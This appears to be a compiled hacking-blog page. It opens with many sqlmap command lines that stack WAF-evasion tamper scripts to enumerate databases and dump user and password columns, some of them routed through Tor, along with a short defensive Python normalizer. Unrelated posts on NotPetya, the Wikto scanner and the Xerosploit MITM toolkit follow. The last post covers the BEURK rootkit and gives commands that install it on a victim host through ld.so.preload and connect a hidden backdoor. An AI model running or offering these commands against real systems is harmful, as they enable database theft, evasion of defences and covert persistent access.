2018

sqlmap tamper WAF bypass methods


--level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
--dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
--dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
-v3 --technique=T --no-cast --fresh-queries --banner
sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs


-f -b --current-user --current-db --is-dba --users --dbs idcategoria=8

--risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell

--risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs

--random-agent --dbms=MYSQL --dbs --technique=B

--identify-waf --random-agent -v 3 --dbs

1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3

--threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump

--tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent

sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"

--banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
-v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu

C:\Python27\python.exe sqlmap.py --wizard

--level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql


sqlmap.py --url www.site.ps/index.php --level 5 --risk 3 --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql

sqlmap.py --url www.site.ps/index.php --level 5 --risk 3 --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql


sqlmap.py --url www.site.ps/index.php --level 5 --risk 3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql


--level=5 --risk=3 -p "id" --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords


--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump

--tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql

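Every tamper script in the lists above rewrites the payload so that a rule matching the raw parameter value no longer fires, while the database still parses it the same way. The following Python is an added example (not from the original page or from sqlmap) of the normalization step a WAF or log-analysis rule needs before matching; the sample payloads are constructed to mimic the named tampers, and `normalize`, `classify` and the two rules are illustrative names.

```python
import re
import urllib.parse

# Constructed sample inputs (not from the original page): each mimics the
# rewriting done by one of the sqlmap tamper scripts listed above.
SAMPLES = {
    "space2comment": "1 UNION/**/SELECT/**/user,password/**/FROM/**/users",
    "randomcase": "1 uNiOn SeLeCt user,password fRoM users",
    "charencode": "1%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20user",
    "chardoubleencode": "1%2520%2555NION%2520%2553ELECT%2520user",
    "multiplespaces": "1    UNION     SELECT    user,password   FROM   users",
    "percentage": "1 %U%N%I%O%N %S%E%L%E%C%T user,password FROM users",
    "benign": "1",
}

# A literal, case-sensitive rule of the kind the tampers are built to slip past.
NAIVE_RULE = re.compile(r"UNION SELECT")
# The same intent, applied to a normalized form of the parameter value.
NORMALIZED_RULE = re.compile(r"\bunion\s+(all\s+)?select\b")


def normalize(value: str, max_decode_rounds: int = 3) -> str:
    """Undo the obfuscations before matching: decode, strip comments, fold case."""
    # charencode / chardoubleencode: percent-decode until the value stops
    # changing, bounded so a hostile input cannot keep the decoder busy.
    for _ in range(max_decode_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    # percentage (ASP targets): a stray '%' before a letter is ignored by the
    # server, so drop it here as well ("%U%N" -> "UN").
    value = re.sub(r"%(?=[A-Za-z])", "", value)
    # space2comment / space2morehash and friends: inline comments act as whitespace.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # multiplespaces / space2randomblank: collapse every whitespace run to one space.
    value = re.sub(r"\s+", " ", value)
    # randomcase: the SQL keyword parser is case-insensitive, so the rule must be too.
    return value.lower()


def classify(value: str) -> dict:
    """Return what each rule decides for one parameter value."""
    return {
        "naive": bool(NAIVE_RULE.search(value)),
        "normalized": bool(NORMALIZED_RULE.search(normalize(value))),
    }


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:18} {classify(payload)}")
```

Every obfuscated sample is missed by the literal rule and caught by the normalized one; the decode loop bound matters because the same transforms can be stacked to exhaust a decoder that loops until stable.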
The latest splash has been made by the Petya or NotPetya ransomware that exploded in Ukraine and is infecting companies all over the world. It's getting some people in deep trouble, as there's no way to recover the files once encrypted.

The malware seems to be trying to hide its intent, as it doesn't really seem to be about making money: $300 is a pretty low amount, and they set up a very poor mechanism for collecting the money (the Posteo account they used has been shut down).

At the current value of Bitcoin there's around $10,000 USD in the wallet mentioned, but with the e-mail address down there's no way for the victims to get in contact with the bad guys to decrypt their files.

It's quite probably a nation-state attack aimed at Ukraine, and it just happened to spread outside. It also doesn't spread over the Internet like WannaCry, but only over the local network.

It seems to be using a whole bunch of tech with bits we've posted about, like Mimikatz and the NSA leak (a modified version of EternalBlue).

It's definitely some pretty slick coding and an impressive piece of malware. But why was it unleashed? Unfortunately, we're unlikely to find out.


Wikto is an open source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version-specific problems on over 250 servers.


What is Wikto

Wikto is not a web application scanner. It is completely unaware of the application (if any) that is running on the web site, so it will not look for SQL injection problems, authorization problems, etc. on a site. It is also not a network-level scanner, so it will not try to find open ports or check whether the web site is properly firewalled. Wikto rather operates between these two levels: it tries, for instance, to find interesting directories and files on the web site, looks for sample scripts that can be abused, or finds known vulnerabilities in the web server implementation itself.

How does Wikto work?

To understand the Wikto component of the application you need to know what Nikto is. Nikto is a text-based web server vulnerability scanner written in Perl by the good folks at CIRT. Nikto scans for over 3000 potential problems on a web server. It is beyond the scope of this document to explain what kinds of checks it performs; you can read all about it in the Nikto post. Like the BackEnd miner, the scanner has the ability to perform fuzzy logic on the responses, thereby greatly reducing the occurrence of false positives. It also has the ability to import directories from both the BackEnd miner and the Googler.

Wikto vs Nikto

Wikto is not just Nikto for Windows. The Nikto scan is just one of its several functions (and it does the Nikto scans completely differently than Nikto does).
It also has extra functionality including fuzzy logic error code checking, a back-end miner, Google-assisted directory mining and real-time HTTP request/response monitoring.

Wikto Web Security Scanner Requirements

To get the most out of the app you also need to install the following:
  • WinHTTrack – a web mirroring tool (you can use the default install)
  • HTTprint – a web server fingerprinting tool (by default, Wikto looks for this in the c:\Tools directory, but you can configure it)
You can download Wikto here: https://github.com/sensepost/wikto/




Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow efficient attacks to be carried out, and also allows denial of service attacks and port scanning. Powered by bettercap and nmap.

Dependencies



  • nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Installation

Dependencies will be installed automatically.
git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit

Features

  • Port scanning
  • Network mapping
  • DoS attack
  • HTML code injection
  • JavaScript code injection
  • Download interception and replacement
  • Sniffing
  • DNS spoofing
  • Background audio reproduction
  • Image replacement
  • Driftnet
  • Webpage defacement and more ...


BEURK is a userland preload rootkit for GNU/Linux, heavily focused on anti-debugging and anti-detection.



Being a userland rootkit, it provides restricted privileges (basically whatever the user has) versus a superuser or root-level rootkit.

Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Usage

Compile:
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make

Install:
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'

./client.py victim_ip:port # connect with furtive backdoor


Dependencies

The following packages are not required in order to build BEURK at the moment:
  • libpcap – to avoid local sniffing
  • libpam – for local PAM backdoor
  • libssl – for encrypted backdoor connection
You can download BEURK here: https://github.com/unix-thrust/beurk